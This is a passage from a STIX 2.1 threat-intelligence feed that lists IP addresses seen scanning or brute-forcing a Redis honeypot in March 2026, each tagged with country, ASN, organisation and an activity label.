      ],
      "modified": "2026-03-25T01:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.76.124.118']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T01:25:15.000Z",
      "valid_until": "2026-04-26T01:25:13.000Z"
    },
    {
      "created": "2026-03-25T04:25:47.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--b2b3ef93-ef76-4780-8ac8-1f443efa35f9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-25T04:25:47.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '119.164.104.43']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T04:25:47.000Z",
      "valid_until": "2026-04-26T04:25:12.000Z"
    },
    {
      "created": "2026-03-25T04:25:47.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--cbb6e617-6d9e-4203-a865-462f45b1151d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-25T04:25:47.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '43.248.109.245']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T04:25:47.000Z",
      "valid_until": "2026-04-26T04:25:12.000Z"
    },
    {
      "created": "2026-03-25T07:26:33.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--68ebda31-294a-4189-a0e4-4a32f4e72040",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-25T07:26:33.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.240.236.116']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T07:26:33.000Z",
      "valid_until": "2026-04-26T07:25:14.000Z"
    },
    {
      "created": "2026-03-25T09:25:40.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--9045821b-982c-4b45-acc9-4f0722e124ec",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-25T09:25:40.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.16']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T09:25:40.000Z",
      "valid_until": "2026-04-26T09:25:12.000Z"
    },
    {
      "created": "2026-03-25T09:25:40.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--505e3d39-98d6-4ff7-91f6-1ded54c8dcd4",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-25T09:25:40.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.35']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T09:25:40.000Z",
      "valid_until": "2026-04-26T09:25:12.000Z"
    },
    {
      "created": "2026-03-25T15:25:11.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--835052ed-487a-4713-abac-ad49dadc1437",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-25T15:25:11.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '162.243.175.91']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T15:25:11.000Z",
      "valid_until": "2026-04-26T15:25:08.000Z"
    },
    {
      "created": "2026-03-25T22:26:22.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; redis_cmd_hits=0",
      "id": "indicator--88272d00-ffbe-40cb-ba36-9db511b27461",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-25T22:26:22.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '194.187.178.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T22:26:22.000Z",
      "valid_until": "2026-04-26T22:25:12.000Z"
    },
    {
      "created": "2026-03-25T22:26:22.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; redis_cmd_hits=0",
      "id": "indicator--efb4d367-5778-4005-aa87-e5534f1770eb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-25T22:26:22.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '194.187.178.51']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T22:26:22.000Z",
      "valid_until": "2026-04-26T22:25:12.000Z"
    },
    {
      "created": "2026-03-25T22:26:22.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--36df6ad7-4ffd-4bfb-9b0e-1c60bb5df99a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-25T22:26:22.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.136.28.197']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-25T22:26:22.000Z",
      "valid_until": "2026-04-26T22:25:12.000Z"
    },
    {
      "created": "2026-03-26T04:25:29.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--ee72bf70-aee5-421d-9433-04249b7a433b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-26T04:25:29.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '113.105.90.148']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-26T04:25:29.000Z",
      "valid_until": "2026-04-27T04:25:22.000Z"
    },
    {
      "created": "2026-03-26T04:25:29.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=1; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--0bc2ae33-bdc7-49e9-b4f7-63239ee4889e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-26T04:25:29.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.34']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-26T04:25:29.000Z",
      "valid_until": "2026-04-27T04:25:22.000Z"
    },
    {
      "created": "2026-03-26T21:25:43.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0",
      "id": "indicator--c0c6c7f2-648b-432a-81ff-7be0b57cbd27",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-26T21:25:43.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '111.231.1.253']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-26T21:25:43.000Z",
      "valid_until": "2026-04-27T21:25:12.000Z"
    },
    {
      "created": "2026-03-26T22:25:01.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=133774; asn_org=Fuzhou; redis_cmd_hits=0",
      "id": "indicator--61cf4731-ab44-4633-bf06-8d0c3589ec6e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-26T22:25:01.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '121.204.160.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-26T22:25:01.000Z",
      "valid_until": "2026-04-27T22:25:00.000Z"
    },
    {
      "created": "2026-03-26T23:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--3cc7ea66-e156-494a-bd1c-17691371e217",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-26T23:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.172.128']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-26T23:25:07.000Z",
      "valid_until": "2026-04-27T23:25:06.000Z"
    },
    {
      "created": "2026-03-26T23:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--3aab1680-bc44-4fad-98e2-9b6d4bd58269",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-26T23:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.186.211']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-26T23:25:07.000Z",
      "valid_until": "2026-04-27T23:25:06.000Z"
    },
    {
      "created": "2026-03-27T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=137718; asn_org=Beijing Volcano Engine Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--b2133504-90d6-4eb1-83c3-e0f358962f83",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.126.20.199']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T01:25:13.000Z",
      "valid_until": "2026-04-28T01:25:12.000Z"
    },
    {
      "created": "2026-03-27T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=CH; asn=211174; asn_org=St. Gallisch-Appenzellische Kraftwerke AG; redis_cmd_hits=0",
      "id": "indicator--405b51cc-6192-476c-9a56-7ab0fa1deac8",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '146.185.94.123']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T01:25:13.000Z",
      "valid_until": "2026-04-28T01:25:12.000Z"
    },
    {
      "created": "2026-03-27T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--d311087e-d802-46f5-8499-e782e43f6110",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '120.48.35.163']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T04:25:13.000Z",
      "valid_until": "2026-04-28T04:25:12.000Z"
    },
    {
      "created": "2026-03-27T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=84; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"SSH-2.0-Go  \"",
      "id": "indicator--5ea5a271-9e38-4f11-993f-d7263f528e0e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.134.216.108']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T05:25:13.000Z",
      "valid_until": "2026-04-28T05:25:06.000Z"
    },
    {
      "created": "2026-03-27T06:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--096a68c3-1166-477e-ba08-71caec8379f1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T06:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '138.68.134.113']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T06:25:16.000Z",
      "valid_until": "2026-04-28T06:25:12.000Z"
    },
    {
      "created": "2026-03-27T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=24; ports=6379; cc=JP; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--cc215133-f976-412d-8b94-caf5d22e63a6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.221.139.48']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T08:25:13.000Z",
      "valid_until": "2026-04-28T08:25:11.000Z"
    },
    {
      "created": "2026-03-27T08:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=FI; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0",
      "id": "indicator--21b84c97-92da-46fe-86b2-288e37710306",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T08:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '89.167.28.24']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T08:25:13.000Z",
      "valid_until": "2026-04-28T08:25:11.000Z"
    },
    {
      "created": "2026-03-27T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--df976b73-fa0f-4038-81c2-af0278a84bb7",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '100.29.192.45']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T10:25:15.000Z",
      "valid_until": "2026-04-28T10:25:13.000Z"
    },
    {
      "created": "2026-03-27T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=VN; asn=18403; asn_org=FPT Telecom Company; redis_cmd_hits=0",
      "id": "indicator--3372bbd4-b894-4120-8a91-c66faba7e60d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '42.118.202.165']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T10:25:15.000Z",
      "valid_until": "2026-04-28T10:25:13.000Z"
    },
    {
      "created": "2026-03-27T10:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--b5eb9702-1685-4646-a8fb-4885f6930469",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T10:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '44.220.188.60']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T10:25:15.000Z",
      "valid_until": "2026-04-28T10:25:13.000Z"
    },
    {
      "created": "2026-03-27T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--3d1d9249-3bf9-4c49-b502-f68c18e7f55b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '173.255.223.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T13:25:13.000Z",
      "valid_until": "2026-04-28T13:25:12.000Z"
    },
    {
      "created": "2026-03-27T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--439b8dc2-5158-4bd5-948a-8f53caa7f0ac",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.79.98.252']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T13:25:13.000Z",
      "valid_until": "2026-04-28T13:25:12.000Z"
    },
    {
      "created": "2026-03-27T14:25:39.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--a9593be2-0445-437d-ae0c-5cfc405a0ae3",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T14:25:39.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '114.55.81.142']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T14:25:39.000Z",
      "valid_until": "2026-04-28T14:25:12.000Z"
    },
    {
      "created": "2026-03-27T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--44a1c03c-25e2-4fa4-84f4-53e24bf230b9",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '216.218.206.120']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T15:25:13.000Z",
      "valid_until": "2026-04-28T15:25:12.000Z"
    },
    {
      "created": "2026-03-27T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--d6d09943-961e-4c6a-86d6-6e9698d988d7",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '216.218.206.68']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T15:25:13.000Z",
      "valid_until": "2026-04-28T15:25:12.000Z"
    },
    {
      "created": "2026-03-27T15:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--90b28aa9-4ea5-4816-90ca-d72b3d015ac0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T15:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.185.212.58']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T15:25:13.000Z",
      "valid_until": "2026-04-28T15:25:12.000Z"
    },
    {
      "created": "2026-03-27T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=FI; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0",
      "id": "indicator--0f98f716-83f4-45f4-81f3-9373200418e4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '37.27.201.67']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T16:25:13.000Z",
      "valid_until": "2026-04-28T16:25:12.000Z"
    },
    {
      "created": "2026-03-27T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--23f9834d-218c-4bf4-9fda-836e627dde3f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.124.169.38']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T16:25:13.000Z",
      "valid_until": "2026-04-28T16:25:12.000Z"
    },
    {
      "created": "2026-03-27T19:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--b4a6ba9b-f1aa-47dd-9f9f-7bd4aaa84437",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T19:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.105.177.106']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T19:25:16.000Z",
      "valid_until": "2026-04-28T19:25:12.000Z"
    },
    {
      "created": "2026-03-27T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=LU; asn=214472; asn_org=Offshore LC; redis_cmd_hits=0",
      "id": "indicator--eaab48f8-d493-482d-80c4-a12a4e58febe",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '176.65.139.90']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T21:25:13.000Z",
      "valid_until": "2026-04-28T21:25:12.000Z"
    },
    {
      "created": "2026-03-27T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--0b1f2107-6f48-4b89-981f-4f19da3f6f1c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.17']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T21:25:13.000Z",
      "valid_until": "2026-04-28T21:25:12.000Z"
    },
    {
      "created": "2026-03-27T21:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--d957bf72-50c3-4ac5-aa6c-939640ca3831",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-27T21:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.230.168.29']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T21:25:13.000Z",
      "valid_until": "2026-04-28T21:25:12.000Z"
    },
    {
      "created": "2026-03-27T23:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=198610; asn_org=Beget LLC; redis_cmd_hits=0",
      "id": "indicator--f8523af7-9bb5-4062-a18e-0da2651e6989",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-27T23:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '155.212.189.201']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-27T23:25:06.000Z",
      "valid_until": "2026-04-28T23:25:05.000Z"
    },
    {
      "created": "2026-03-28T03:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--7a57893c-9c84-43bf-80b7-48f0ab77dcd1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-28T03:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.188.57.88']",
      "pattern_type": "stix",
